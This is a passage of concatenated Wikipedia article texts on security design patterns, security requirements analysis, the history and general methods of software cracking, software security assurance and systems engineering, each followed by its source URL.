andmetaphorsfrom these works is very common.[53]
https://en.wikipedia.org/wiki/Security_hacker
Security patternscan be applied to achieve goals in the area of security. All of the classical design patterns have different instantiations to fulfill someinformation securitygoal: such as confidentiality, integrity, and availability. Additionally, one can create a new design pattern to specifically achieve some security goal. The pattern community has provided a collection of security patterns, which were discussed in workshops atPattern Languages of Programs(PLoP) conferences. They have been unified and published in a joint project.[1] The Open Groupprovides a set of documented security patterns. These are patterns that are concerned with the availability of the assets. The assets are either services or resources offered to users. This is a set of patterns concerned with the confidentiality and integrity of information by providing means to manage access and usage of the sensitive data. Theprotected systempattern provides some reference monitor or enclave that owns the resources and therefore must be bypassed to get access. The monitor enforces as the single point a policy.Design Patternsrefers to it as "Protection Proxy". Thepolicy patternis an architecture to decouple the policy from the normal resource code. An authenticated user owns a security context (erg. a role) that is passed to the guard of resource. The guard checks inside the policy whether the context of this user and the rules match and provides or denies access to the resource. Theauthenticatorpattern is also known as thePluggable Authentication Modulesor Java Authentication and Authorization Service (JAAS). This is a set of security patterns evolved by Sun Java Center –Sun Microsystemsengineers Ramesh Nagappan and Christopher Steel, which helps building end-to-end security into multi-tier Java EE enterprise applications, XML-based Web services, enabling identity management in Web applications includingsingle sign-on authentication,multi-factor authentication, and enabling Identity provisioning in Web-based applications.
https://en.wikipedia.org/wiki/Security_pattern
Insystems engineeringandsoftware engineering,requirements analysisfocuses on the tasks that determine the needs or conditions to meet the new or altered product or project, taking account of the possibly conflictingrequirementsof the variousstakeholders,analyzing,documenting,validating, andmanagingsoftware orsystem requirements.[2] Requirements analysis is critical to the success or failure of systems orsoftware projects.[3]The requirements should be documented, actionable, measurable, testable,[4]traceable,[4]related to identified business needs or opportunities, and defined to a level of detail sufficient forsystem design. Conceptually, requirements analysis includes three types of activities:[citation needed] Requirements analysis can be a long and tiring process during which many delicate psychological skills are involved. New systems change the environment and relationships between people, so it is important to identify all the stakeholders, take into account all their needs, and ensure they understand the implications of the new systems. Analysts can employ several techniques to elicit the requirements from the customer. These may include the development of scenarios (represented asuser storiesinagile methods), the identification ofuse cases, the use of workplace observation orethnography, holdinginterviews, orfocus groups(more aptly named in this context as requirements workshops, or requirements review sessions) and creating requirements lists.Prototypingmay be used to develop an example system that can be demonstrated to stakeholders. Where necessary, the analyst will employ a combination of these methods to establish the exact requirements of the stakeholders, so that a system that meets the business needs is produced.[5][6]Requirements quality can be improved through these and other methods: SeeStakeholder analysisfor a discussion of people or organizations (legal entities such as companies, and standards bodies) that have a valid interest in the system. They may be affected by it either directly or indirectly. A major new emphasis in the 1990s was a focus on the identification ofstakeholders. It is increasingly recognized that stakeholders are not limited to the organization employing the analyst. Other stakeholders will include: Requirements often have cross-functional implications that are unknown to individual stakeholders and often missed or incompletely defined during stakeholder interviews. These cross-functional implications can be elicited by conducting JRD sessions in a controlled environment, facilitated by a trainedfacilitator(Business Analyst), wherein stakeholders participate in discussions to elicit requirements, analyze their details, and uncover cross-functional implications. A dedicated scribe should be present to document the discussion, freeing up the Business Analyst to lead the discussion in a direction that generates appropriate requirements that meet the session objective. JRD Sessions are analogous toJoint Application DesignSessions. In the former, the sessions elicit requirements that guide design, whereas the latter elicit the specific design features to be implemented in satisfaction of elicited requirements. One traditional way of documenting requirements has been contract-style requirement lists. In a complex system such requirements lists can run hundreds of pages long. An appropriate metaphor would be an extremely long shopping list. Such lists are very much out of favor in modern analysis; as they have proved spectacularly unsuccessful at achieving their aims[citation needed]; but they are still seen to this day. As an alternative to requirement lists,Agile Software DevelopmentusesUser storiesto suggest requirements in everyday language. Best practices take the composed list of requirements merely as clues and repeatedly ask "why?" until the actual business purposes are discovered. Stakeholders and developers can then devise tests to measure what level of each goal has been achieved thus far. Such goals change more slowly than the long list of specific but unmeasured requirements. Once a small set of critical, measured goals has been established,rapid prototypingand short iterative development phases may proceed to deliver actual stakeholder value long before the project is half over. A prototype is a computer program that exhibits a part of the properties of another computer program, allowing users to visualize an application that has not yet been constructed. A popular form of prototype is amockup, which helps future users and other stakeholders get an idea of what the system will look like. Prototypes make it easier to make design decisions because aspects of the application can be seen and shared before the application is built. Major improvements in communication between users and developers were often seen with the introduction of prototypes. Early views of applications led to fewer changes later and hence reduced overall costs considerably.[citation needed] Prototypes can be flat diagrams (often referred to aswireframes) or working applications using synthesized functionality. Wireframes are made in a variety of graphic design documents, and often remove all color from the design (i.e. use a greyscale color palette) in instances where the final software is expected to have agraphic designapplied to it. This helps to prevent confusion as to whether the prototype represents the final visual look and feel of the application.[citation needed] A use case is a structure for documenting the functional requirements for a system, usually involving software, whether that is new or being changed. Each use case provides a set ofscenariosthat convey how the system should interact with a human user or another system, to achieve a specific business goal. Use cases typically avoid technical jargon, preferring instead the language of theend-userordomain expert. Use cases are often co-authored by requirements engineers and stakeholders. Use cases are deceptively simple tools for describing the behavior of software or systems. A use case contains a textual description of how users are intended to work with the software or system. Use cases should not describe the internal workings of the system, nor should they explain how that system will be implemented. Instead, they show the steps needed to perform a task without sequential assumptions. Requirements specification is the synthesis of discovery findings regarding current state business needs and the assessment of these needs to determine, and specify, what is required to meet the needs within the solution scope in focus. Discovery, analysis, and specification move the understanding from a current as-is state to a future to-be state. Requirements specification can cover the full breadth and depth of the future state to be realized, or it could target specific gaps to fill, such as priority software system bugs to fix and enhancements to make. Given that any large business process almost always employs software and data systems and technology, requirements specification is often associated with software system builds, purchases, cloud computing strategies, embedded software in products or devices, or other technologies. The broader definition of requirements specification includes or focuses on any solution strategy or component, such as training, documentation guides, personnel, marketing strategies, equipment, supplies, etc. Requirementsarecategorizedin several ways. The following are common categorizations of requirements that relate to technical management:[1] Statements of business level goals, without reference to detailed functionality. These are usually high-level (software and/or hardware) capabilities that are needed to achieve a business outcome. Statements of fact and assumptions that define the expectations of the system in terms of mission objectives, environment, constraints, and measures of effectiveness and suitability (MOE/MOS). The customers are those that perform the eight primary functions of systems engineering, with special emphasis on the operator as the key customer. Operational requirements will define the basic need and, at a minimum, answer the questions posed in the following listing:[1] Architectural requirements explain what has to be done by identifying the necessarysystems architectureof asystem. Behavioral requirements explain what has to be done by identifying the necessarybehaviorof a system. Functional requirementsexplain what has to be done by identifying the necessary task, action or activity that must be accomplished. Functional requirements analysis will be used as the toplevel functions for functional analysis.[1] Non-functional requirementsare requirements that specify criteria that can be used to judge the operation of a system, rather than specific behaviors. The extent to which a mission or function must be executed; is generally measured in terms of quantity, quality, coverage, timeliness, or readiness. During requirements analysis, performance (how well does it have to be done) requirements will be interactively developed across all identified functions based on system life cycle factors; and characterized in terms of the degree of certainty in their estimate, the degree of criticality to the system success, and their relationship to other requirements.[1] The "build to", "code to", and "buy to" requirements for products and "how to execute" requirements for processes are expressed in technical data packages and technical manuals.[1] Requirements that are implied or transformed from higher-level requirements. For example, a requirement for long-range or high speed may result in a design requirement for low weight.[1] A requirement is established by dividing or otherwise allocating a high-level requirement into multiple lower-level requirements. Example: A 100-pound item that consists of two subsystems might result in weight requirements of 70 pounds and 30 pounds for the two lower-level items.[1] Well-known requirements categorization models includeFURPSand FURPS+, developed atHewlett-Packard. Steve McConnell, in his bookRapid Development, details a number of ways users can inhibit requirements gathering: This may lead to the situation where user requirements keep changing even when system or product development has been started. Possible problems caused by engineers and developers during requirements analysis are: One attempted solution to communications problems has been to employ specialists in business or system analysis. Techniques introduced in the 1990s likeprototyping,Unified Modeling Language(UML),use cases, andagile software developmentare also intended as solutions to problems encountered with previous methods. Also, a new class ofapplication simulationor application definition tools has entered the market. These tools are designed to bridge the communication gap between business users and the IT organization — and also to allow applications to be 'test marketed' before any code is produced. The best of these tools offer: [1]
https://en.wikipedia.org/wiki/Security_Requirements_Analysis
Software cracking(known as "breaking" mostly in the 1980s[1]) is an act of removingcopy protectionfrom a software.[2]Copy protection can be removed by applying a specificcrack. Acrackcan mean any tool that enables breaking software protection, a stolen product key, or guessed password. Cracking software generally involves circumventing licensing and usage restrictions on commercial software by illegal methods. These methods can include modifying code directly through disassembling and bit editing, sharing stolen product keys, or developing software to generate activation keys.[3]Examples ofcracks are: applying apatchor by creating reverse-engineered serial number generators known askeygens, thus bypassing software registration and payments or converting a trial/demo version of the software into fully-functioning software without paying for it.[4]Software cracking contributes to the rise ofonline piracywhere pirated software is distributed to end-users[2]through filesharing sites likeBitTorrent,One click hosting(OCH), or viaUsenetdownloads, or by downloading bundles of the original software with cracks or keygens.[4] Some of these tools are calledkeygen,patch,loader, orno-disc crack. A keygen is a handmade product serial number generator that often offers the ability to generate working serial numbers in your own name. A patch is a small computer program that modifies the machine code of another program. This has the advantage for a cracker to not include a large executable in a release when only a few bytes are changed.[5]A loader modifies the startup flow of a program and does not remove the protection but circumvents it.[6][7]A well-known example of a loader is atrainerused to cheat in games.[8]Fairlightpointed out in one of their.nfofiles that these type of cracks are not allowed forwarez scenegame releases.[9][6][10]Anukewarhas shown that the protection may not kick in at any point for it to be a valid crack.[11] Software cracking is closely related toreverse engineeringbecause the process of attacking a copy protection technology, is similar to the process of reverse engineering.[12]The distribution of cracked copies is illegal in most countries. There have been lawsuits over cracking software.[13]It might be legal to use cracked software in certain circumstances.[14]Educational resources for reverse engineering and software cracking are, however, legal and available in the form ofCrackmeprograms. Software are inherently expensive to produce but cheap to duplicate and distribute. Therefore, software producers generally tried to implement some form ofcopy protectionbefore releasing it to the market. In 1984, Laind Huntsman, the head of software development for Formaster, a software protection company, commented that "no protection system has remained uncracked by enterprising programmers for more than a few months".[2]In 2001, Dan S. Wallach, a professor fromRice University, argued that "those determined to bypass copy-protection have always found ways to do so – and always will".[15] Most of the early software crackers were computer hobbyists who often formed groups that competed against each other in the cracking and spreading of software. Breaking a new copy protection scheme as quickly as possible was often regarded as an opportunity to demonstrate one's technical superiority rather than a possibility of money-making. Software crackers usually did not benefit materially from their actions and their motivation was the challenge itself of removing the protection.[2]Some low skilled hobbyists would take already cracked software and edit various unencrypted strings of text in it to change messages a game would tell a game player, often something considered vulgar. Uploading the altered copies on file sharing networks provided a source of laughs for adult users. The cracker groups of the 1980s started to advertise themselves and their skills by attaching animated screens known ascrack introsin the software programs they cracked and released.[16]Once the technical competition had expanded from the challenges of cracking to the challenges of creating visually stunning intros, the foundations for a new subculture known asdemoscenewere established. Demoscene started to separate itself from the illegal "warez scene" during the 1990s and is now regarded as a completely different subculture. Many software crackers have later grown into extremely capable software reverse engineers; the deep knowledge of assembly required in order to crack protections enables them toreverse engineerdriversin order to port them from binary-only drivers forWindowsto drivers with source code forLinuxand otherfreeoperating systems. Also because music and game intro was such an integral part of gaming the music format and graphics became very popular when hardware became affordable for the home user. With the rise of theInternet, software crackers developed secretive online organizations. In the latter half of the nineties, one of the most respected sources of information about "software protection reversing" wasFravia's website. In 2017, a group of software crackers started a project to preserveApple IIsoftware by removing thecopy protection.[17] TheHigh Cracking University(+HCU) was founded byOld Red Cracker(+ORC), considered a genius of reverse engineering and a legendary figure inReverse Code Engineering(RCE), to advance research into RCE. He had also taught and authored many papers on the subject, and his texts are considered classics in the field and are mandatory reading for students of RCE.[18] The addition of the "+" sign in front of the nickname of a reverser signified membership in the +HCU. Amongst the students of +HCU were the top of the elite Windows reversers worldwide.[18]+HCU published a new reverse engineering problem annually and a small number of respondents with the best replies qualified for an undergraduate position at the university.[18] +Fravia was a professor at +HCU. Fravia's website was known as "+Fravia's Pages of Reverse Engineering" and he used it to challenge programmers as well as the wider society to "reverse engineer" the "brainwashing of a corrupt and rampant materialism". In its heyday, his website received millions of visitors per year and its influence was "widespread".[18]On his site, +Fravia also maintained a database of the tutorials generated by +HCU students for posterity.[19] Nowadays most of the graduates of +HCU have migrated to Linux and few have remained as Windows reversers. The information at the university has been rediscovered by a new generation of researchers and practitioners of RCE who have started new research projects in the field.[18] The most common software crack is the modification of an application's binary to cause or prevent a specific key branch in the program's execution. This is accomplished byreverse engineeringthe compiled program code using adebuggersuch asx64dbg,SoftICE,[20]OllyDbg,GDB, orMacsBuguntil the software cracker reaches thesubroutinethat contains the primary method of protecting the software (or bydisassemblingan executable file with a program such asIDA).[21]The binary is then modified using thedebuggeror ahex editorsuch asHIEW[22]ormonitorin a manner that replaces a prior branchingopcodewith its complement or aNOPopcodeso the key branch will either always execute a specificsubroutineor skip over it. Almost all common software cracks are a variation of this type. A region of code that must not be entered is often called a "bad boy" while one that should be followed is a "good boy".[23] Proprietary softwaredevelopers are constantly developing techniques such ascode obfuscation,encryption, andself-modifying codeto make binary modification increasingly difficult.[24]Even with these measures being taken, developers struggle to combat software cracking. This is because it is very common for a professional to publicly release a simple cracked EXE or Retrium Installer for public download, eliminating the need for inexperienced users to crack the software themselves. A specific example of this technique is a crack that removes the expiration period from a time-limited trial of an application. These cracks are usually programs that alter the program executable and sometimes the.dll or .solinked to the application and the process of altering the original binary files is called patching.[12]Similar cracks are available for software that requires a hardwaredongle. A company can also break the copy protection of programs that they have legally purchased but that arelicensedto particular hardware, so that there is no risk of downtime due to hardware failure (and, of course, no need to restrict oneself to running the software on bought hardware only). Another method is the use of special software such asCloneCDto scan for the use of a commercial copy protection application. After discovering the software used to protect the application, another tool may be used to remove the copy protection from the software on theCDorDVD. This may enable another program such asAlcohol 120%, CloneDVD,Game Jackal, orDaemon Toolsto copy the protected software to a user's hard disk. Popular commercial copy protection applications which may be scanned for includeSafeDiscandStarForce.[25] In other cases, it might be possible todecompilea program in order to get access to the originalsource codeor code on alevel higherthanmachine code. This is often possible withscripting languagesand languages utilizingJITcompilation. An example is cracking (or debugging) on the .NET platform where one might consider manipulatingCILto achieve one's needs.Java'sbytecodealso works in a similar fashion in which there is an intermediate language before the program is compiled to run on the platform dependentmachine code.[26] Advanced reverse engineering for protections such asSecuROM,SafeDisc,StarForce, orDenuvorequires a cracker, or many crackers to spend much more time studying the protection, eventually finding every flaw within the protection code, and then coding their own tools to "unwrap" the protection automatically from executable (.EXE) and library (.DLL) files. There are a number of sites on the Internet that let users download cracks produced bywarez groupsfor popular games and applications (although at the danger of acquiring malicious software that is sometimes distributed via such sites).[27]Although these cracks are used by legal buyers of software, they can also be used by people who have downloaded or otherwise obtained unauthorized copies (often throughP2Pnetworks). Software cracking led to the distribution of pirated software around the world (software piracy). It was estimated that the United States lost US$2.3 billion in business application software in 1996. Software piracy rates were especially prevalent in African, Asian, Eastern European, and Latin American countries. In certain countries such as Indonesia, Pakistan, Kuwait, China, and El Salvador,[28]90% of the software used was pirated.[29]
https://en.wikipedia.org/wiki/Software_cracking
Software security assuranceis a process that helps design and implementsoftwarethat protects thedataandresourcescontained in and controlled by that software. Software is itself a resource and thus must be afforded appropriatesecurity. Software Security Assurance (SSA) is the process of ensuring thatsoftwareis designed to operate at a level of security that is consistent with the potential harm that could result from the loss, inaccuracy, alteration, unavailability, or misuse of the data and resources that it uses, controls, and protects.[1] The software security assurance process begins by identifying and categorizing the information that is to be contained in, or used by, the software. The information should be categorized according to itssensitivity. For example, in the lowest category, the impact of a security violation is minimal (i.e. the impact on the software owner's mission, functions, or reputation is negligible). For a top category, however, the impact may pose a threat to human life; may have an irreparable impact on software owner's missions, functions, image, or reputation; or may result in the loss of significant assets or resources. Once the information is categorized, security requirements can be developed. The security requirements should addressaccess control, includingnetworkaccess and physical access; data management and data access; environmental controls (power, air conditioning, etc.) andoff-line storage; human resource security; and audit trails and usage records. All security vulnerabilities in software are the result ofsecurity bugs, or defects, within the software. In most cases, these defects are created by two primary causes: (1) non-conformance, or a failure to satisfy requirements; and (2) an error or omission in the software requirements. A non-conformance may be simple–the most common is a coding error or defect–or more complex (i.e., a subtle timing error or input validation error). The important point about non-conformance is thatverification and validationtechniques are designed to detect them and security assurance techniques are designed to prevent them. Improvements in these methods, through a software security assurance program, can improve the security of software. The most serious security problems with software-based systems are those that develop when the software requirements are incorrect, inappropriate, or incomplete for the system situation. Unfortunately, errors or omissions in requirements are more difficult to identify. For example, the software may perform exactly as required under normal use, but the requirements may not correctly deal with somesystem state. When the system enters this problem state, unexpected and undesirable behavior may result. This type of problem cannot be handled within the software discipline; it results from a failure of the system and software engineering processes which developed and allocated the system requirements to the software. There are two basic types of Software Security Assurance activities. At a minimum, a software security assurance program should ensure that: Improving the software development process and building better software are ways to improvesoftware security, by producing software with fewer defects and vulnerabilities. A first-order approach is to identify the critical software components that control security-related functions and pay special attention to them throughout the development and testing process. This approach helps to focus scarce security resources on the most critical areas. There are manycommercial off-the-shelf(COTS) software packages that are available to support software security assurance activities. However, before they are used, these tools must be carefully evaluated and their effectiveness must be assured. One way to improve software security is to gain a better understanding of the most commonweaknessesthat can affect software security. With that in mind, there is a current community-based program called the Common Weaknesses Enumeration project,[2]which is sponsored by TheMitre Corporationto identify and describe such weaknesses. The list, which is currently in a very preliminary form, contains descriptions of common software weaknesses, faults, and flaws. Security architecture/design analysis verifies that the software design correctly implements security requirements. Generally speaking, there are four basic techniques that are used for security architecture/design analysis.[3][4] Logic analysis evaluates theequations,algorithms, andcontrol logicof the software design. Data analysis evaluates the description and intended usage of each data item used in design of thesoftware component. The use of interrupts and their effect on data should receive special attention to ensure interrupt handling routines do not alter critical data used by other routines. Interfaceanalysis verifies the proper design of a software component's interfaces with other components of the system, includingcomputer hardware, software, andend-users. Constraint analysis evaluates the design of a software component against restrictions imposed by requirements and real-world limitations. The design must be responsive to all known or anticipated restrictions on the software component. These restrictions may include timing, sizing, and throughput constraints, input and output data limitations, equation and algorithm limitations, and other design limitations. Code analysis verifies that the softwaresource codeis written correctly, implements the desired design, and does not violate any security requirements. Generally speaking, the techniques used in the performance of code analysis mirror those used in design analysis. SecureCode reviewsare conducted during and at the end of the development phase to determine whether established security requirements, security design concepts, and security-related specifications have been satisfied. These reviews typically consist of the presentation of material to a review group. Secure code reviews are most effective when conducted by personnel who have not been directly involved in the development of the software being reviewed. Informal secure code reviews can be conducted on an as-needed basis. To conduct an informal review, the developer simply selects one or more reviewer(s) and provides and/or presents the material to be reviewed. The material may be as informal aspseudo-codeor hand-written documentation. Formal secure code reviews are conducted at the end of the development phase for each software component. The client of the software appoints the formal review group, who may make or affect a "go/no-go" decision to proceed to the next step of thesoftware development life cycle. A secure code inspection or walkthrough is a detailed examination of a product on a step-by-step or line-by-line (ofsource code) basis. The purpose of conducting secure code inspections or walkthroughs is to find errors. Typically, the group that does an inspection or walkthrough is composed of peers from development,security engineeringandquality assurance. Softwaresecurity testing, which includespenetration testing, confirms the results of design and code analysis, investigates software behaviour, and verifies that the software complies with security requirements. Special security testing, conducted in accordance with a security test plan and procedures, establishes the compliance of the software with the security requirements. Security testing focuses on locating software weaknesses and identifying extreme or unexpected situations that could cause the software to fail in ways that would cause a violation of security requirements. Security testing efforts are often limited to the software requirements that are classified as "critical" security items.
https://en.wikipedia.org/wiki/Software_security_assurance
Systems engineeringis aninterdisciplinaryfield ofengineeringandengineering managementthat focuses on how to design, integrate, and managecomplex systemsover theirlife cycles. At its core, systems engineering utilizessystems thinkingprinciples to organize thisbody of knowledge. The individual outcome of such efforts, anengineered system, can be defined as a combination of components that work insynergyto collectively perform a usefulfunction. Issues such asrequirements engineering,reliability,logistics, coordination of different teams, testing and evaluation, maintainability, and many otherdisciplines, aka"ilities", necessary for successfulsystem design, development,implementation, and ultimate decommission become more difficult when dealing with large or complexprojects. Systems engineering deals with work processes, optimization methods, andrisk managementtools in such projects. It overlaps technical and human-centered disciplines such asindustrial engineering,production systems engineering,process systems engineering,mechanical engineering,manufacturing engineering,production engineering,control engineering,software engineering,electrical engineering,cybernetics,aerospace engineering,organizational studies,civil engineeringandproject management. Systems engineering ensures that all likely aspects of a project or system are considered and integrated into a whole. The systems engineering process is a discovery process that is quite unlike amanufacturingprocess. A manufacturing process is focused on repetitive activities that achieve high-quality outputs with minimum cost and time. The systems engineering process must begin by discovering the real problems that need to be resolved and identifying the most probable or highest-impact failures that can occur. Systems engineering involves finding solutions to these problems. The termsystems engineeringcan be traced back toBell Telephone Laboratoriesin the 1940s.[1]The need to identify and manipulate the properties of a system as a whole, which in complex engineering projects may greatly differ from the sum of the parts' properties, motivated various industries, especially those developing systems for the U.S. military, to apply the discipline.[2][3] When it was no longer possible to rely on design evolution to improve upon a system and the existing tools were not sufficient to meet growing demands, new methods began to be developed that addressed the complexity directly.[4]The continuing evolution of systems engineering comprises the development and identification of new methods and modeling techniques. These methods aid in a better comprehension of the design and developmental control of engineering systems as they grow more complex. Popular tools that are often used in the systems engineering context were developed during these times, includingUniversal Systems Language(USL),Unified Modeling Language(UML),Quality function deployment(QFD), andIntegration Definition(IDEF). In 1990, a professional society for systems engineering, theNational Council on Systems Engineering(NCOSE), was founded by representatives from a number of U.S. corporations and organizations. NCOSE was created to address the need for improvements in systems engineering practices and education. As a result of growing involvement from systems engineers outside of the U.S., the name of the organization was changed to theInternational Council on Systems Engineering(INCOSE) in 1995.[5]Schools in several countries offer graduate programs in systems engineering, andcontinuing educationoptions are also available for practicing engineers.[6] Systems engineering signifies only an approach and, more recently, a discipline in engineering. The aim of education in systems engineering is to formalize various approaches simply and in doing so, identify new methods and research opportunities similar to that which occurs in other fields of engineering. As an approach, systems engineering is holistic and interdisciplinary in flavor. The traditional scope of engineering embraces the conception, design, development, production, and operation of physical systems. Systems engineering, as originally conceived, falls within this scope. "Systems engineering", in this sense of the term, refers to the building of engineering concepts. The use of the term "systems engineer" has evolved over time to embrace a wider, more holistic concept of "systems" and of engineering processes. This evolution of the definition has been a subject of ongoing controversy,[13]and the term continues to apply to both the narrower and a broader scope. Traditional systems engineering was seen as a branch of engineering in the classical sense, that is, as applied only to physical systems, such as spacecraft and aircraft. More recently, systems engineering has evolved to take on a broader meaning especially when humans were seen as an essential component of a system.Peter Checkland, for example, captures the broader meaning of systems engineering by stating that 'engineering' "can be read in its general sense; you can engineer a meeting or a political agreement."[14]: 10 Consistent with the broader scope of systems engineering, theSystems Engineering Body of Knowledge(SEBoK)[15]has defined three types of systems engineering: Systems engineering focuses on analyzing andelicitingcustomer needs and required functionality early in thedevelopment cycle, documenting requirements, then proceeding with design synthesis and system validation while considering the complete problem, thesystem lifecycle. This includes fully understanding all of thestakeholdersinvolved. Oliver et al. claim that the systems engineering process can be decomposed into: Within Oliver's model, the goal of the Management Process is to organize the technical effort in the lifecycle, while the Technical Process includesassessing available information,defining effectiveness measures, tocreate a behavior model,create a structure model,perform trade-off analysis, andcreate sequential build & test plan.[16] Depending on their application, although there are several models that are used in the industry, all of them aim to identify the relation between the various stages mentioned above and incorporate feedback. Examples of such models include theWaterfall modeland theVEE model(also called the V model).[17] System development often requires contribution from diverse technical disciplines.[18]By providing a systems (holistic) view of the development effort, systems engineering helps mold all the technical contributors into a unified team effort, forming a structured development process that proceeds from concept to production to operation and, in some cases, to termination and disposal. In an acquisition, the holistic integrative discipline combines contributions and balances tradeoffs among cost, schedule, and performance while maintaining an acceptable level of risk covering the entire life cycle of the item.[19] This perspective is often replicated in educational programs, in that systems engineering courses are taught by faculty from other engineering departments, which helps create an interdisciplinary environment.[20][21] The need for systems engineering arose with the increase in complexity of systems and projects, in turn exponentially increasing the possibility of component friction, and therefore the unreliability of the design. When speaking in this context, complexity incorporates not only engineering systems but also the logical human organization of data. At the same time, a system can become more complex due to an increase in size as well as with an increase in the amount of data, variables, or the number of fields that are involved in the design. TheInternational Space Stationis an example of such a system. The development of smarter controlalgorithms,microprocessor design, andanalysis of environmental systemsalso come within the purview of systems engineering. Systems engineering encourages the use of tools and methods to better comprehend and manage complexity in systems. Some examples of these tools can be seen here:[22] Taking aninterdisciplinaryapproach to engineering systems is inherently complex since thebehaviorof and interaction among system components is not always immediatelywell definedor understood. Defining and characterizing suchsystemsand subsystems and the interactions among them is one of the goals of systems engineering. In doing so, the gap that exists between informal requirements from users,operators,marketingorganizations, andtechnical specificationsis successfully bridged. [23] The principles of systems engineering – holism, emergent behavior, boundary, et al. – can be applied to any system, complex or otherwise, providedsystems thinkingis employed at all levels.[24]Besides defense and aerospace, many information and technology-based companies,software developmentfirms, and industries in the field ofelectronics & communicationsrequire systems engineers as part of their team.[25] An analysis by the INCOSE Systems Engineering Center of Excellence (SECOE) indicates that optimal effort spent on systems engineering is about 15–20% of the total project effort.[26]At the same time, studies have shown that systems engineering essentially leads to a reduction in costs among other benefits.[26]However, no quantitative survey at a larger scale encompassing a wide variety of industries has been conducted until recently. Such studies are underway to determine the effectiveness and quantify the benefits of systems engineering.[27][28] Systems engineering encourages the use ofmodeling and simulationto validate assumptions or theories on systems and the interactions within them.[29][30] Use of methods that allow early detection of possible failures, insafety engineering, are integrated into the design process. At the same time, decisions made at the beginning of a project whose consequences are not clearly understood can have enormous implications later in the life of a system, and it is the task of the modern systems engineer to explore these issues and make critical decisions. No method guarantees today's decisions will still be valid when a system goes into service years or decades after first conceived. However, there are techniques that support the process of systems engineering. Examples include soft systems methodology,Jay Wright Forrester'sSystem dynamicsmethod, and theUnified Modeling Language(UML)—all currently being explored, evaluated, and developed to support the engineering decision process. Education in systems engineering is often seen as an extension to the regular engineering courses,[31]reflecting the industry attitude that engineering students need a foundational background in one of the traditional engineering disciplines (e.g.aerospace engineering,civil engineering,electrical engineering,mechanical engineering,manufacturing engineering,industrial engineering,chemical engineering)—plus practical, real-world experience to be effective as systems engineers. Undergraduate university programs explicitly in systems engineering are growing in number but remain uncommon, the degrees including such material are most often presented as aBSin Industrial Engineering. Typically programs (either by themselves or in combination with interdisciplinary study) are offered beginning at the graduate level in both academic and professional tracks, resulting in the grant of either aMS/MEngorPh.D./EngDdegree. INCOSE, in collaboration with the Systems Engineering Research Center atStevens Institute of Technologymaintains a regularly updated directory of worldwide academic programs at suitably accredited institutions.[6]As of 2017, it lists over 140 universities in North America offering more than 400 undergraduate and graduate programs in systems engineering. Widespread institutional acknowledgment of the field as a distinct subdiscipline is quite recent; the 2009 edition of the same publication reported the number of such schools and programs at only 80 and 165, respectively. Education in systems engineering can be taken assystems-centricordomain-centric: Both of these patterns strive to educate the systems engineer who is able to oversee interdisciplinary projects with the depth required of a core engineer.[32] Systems engineering tools arestrategies, procedures, andtechniquesthat aid in performing systems engineering on aprojectorproduct. The purpose of these tools varies from database management, graphical browsing, simulation, and reasoning, to document production, neutral import/export, and more.[33] There are many definitions of what asystemis in the field of systems engineering. Below are a few authoritative definitions: Systems engineering processes encompass all creative, manual, and technical activities necessary to define the product and which need to be carried out to convert a system definition to a sufficiently detailed system design specification for product manufacture and deployment. Design and development of a system can be divided into four stages, each with different definitions:[41] Depending on their application, tools are used for various stages of the systems engineering process:[23] Modelsplay important and diverse roles in systems engineering. A model can be defined in several ways, including:[42] Together, these definitions are broad enough to encompass physical engineering models used in the verification of a system design, as well as schematic models like afunctional flow block diagramand mathematical (i.e. quantitative) models used in the trade study process. This section focuses on the last.[42] The main reason for usingmathematical modelsanddiagramsin trade studies is to provide estimates of system effectiveness, performance or technical attributes, and cost from a set of known or estimable quantities. Typically, a collection of separate models is needed to provide all of these outcome variables. The heart of any mathematical model is a set of meaningful quantitative relationships among its inputs and outputs. These relationships can be as simple as adding up constituent quantities to obtain a total, or as complex as a set ofdifferential equationsdescribing the trajectory of a spacecraft in agravitational field. Ideally, the relationships express causality, not just correlation.[42]Furthermore, key to successful systems engineering activities are also the methods with which these models are efficiently and effectively managed and used to simulate the systems. However, diverse domains often present recurring problems of modeling and simulation for systems engineering, and new advancements are aiming to cross-fertilize methods among distinct scientific and engineering communities, under the title of 'Modeling & Simulation-based Systems Engineering'.[43][page needed] Initially, when the primary purpose of a systems engineer is to comprehend a complex problem, graphic representations of a system are used to communicate a system'sfunctionaland data requirements.[44]Common graphical representations include: A graphical representation relates the various subsystems or parts of a system through functions, data, or interfaces. Any or each of the above methods is used in an industry based on its requirements. For instance, the N2 chart may be used where interfaces between systems are important. Part of the design phase is to createstructuralandbehavioral modelsof the system. Once the requirements are understood, it is now the responsibility of a systems engineer to refine them and to determine, along with other engineers, the best technology for a job. At this point starting with a trade study, systems engineering encourages the use of weighted choices to determine the best option. Adecision matrix, or Pugh method, is one way (QFD is another) to make this choice while considering all criteria that are important. The trade study in turn informs the design, which again affects graphic representations of the system (without changing the requirements). In an SE process, this stage represents the iterative step that is carried out until a feasible solution is found. A decision matrix is often populated using techniques such as statistical analysis, reliability analysis, system dynamics (feedback control), and optimization methods. Systems Modeling Language(SysML), a modeling language used for systems engineering applications, supports the specification, analysis, design, verification and validation of a broad range of complex systems.[45] Lifecycle Modeling Language(LML), is an open-standard modeling language designed for systems engineering that supports the full lifecycle: conceptual, utilization, support, and retirement stages.[46] Many related fields may be considered tightly coupled to systems engineering. The following areas have contributed to the development of systems engineering as a distinct entity: Cognitive systems engineering (CSE) is a specific approach to the description and analysis ofhuman-machine systemsorsociotechnical systems.[47]The three main themes of CSE are how humans cope with complexity, how work is accomplished by the use ofartifacts, and how human-machine systems and socio-technical systems can be described as joint cognitive systems. CSE has since its beginning become a recognized scientific discipline, sometimes also referred to ascognitive engineering. The concept of a Joint Cognitive System (JCS) has in particular become widely used as a way of understanding how complex socio-technical systems can be described with varying degrees of resolution. The more than 20 years of experience with CSE has been described extensively.[48][49] Like systems engineering,configuration managementas practiced in thedefenseandaerospace industryis a broad systems-level practice. The field parallels the taskings of systems engineering; where systems engineering deals with requirements development, allocation to development items and verification, configuration management deals with requirements capture, traceability to the development item, and audit of development item to ensure that it has achieved the desired functionality and outcomes that systems engineering and/or Test and Verification Engineering have obtained and proven through objective testing. Control engineeringand its design and implementation ofcontrol systems, used extensively in nearly every industry, is a large sub-field of systems engineering. The cruise control on an automobile and the guidance system for a ballistic missile are two examples. Control systems theory is an active field of applied mathematics involving the investigation of solution spaces and the development of new methods for the analysis of the control process. Industrial engineeringis a branch ofengineeringthat concerns the development, improvement, implementation, and evaluation of integrated systems of people, money, knowledge, information, equipment, energy, material, and process. Industrial engineering draws upon the principles and methods of engineering analysis and synthesis, as well as 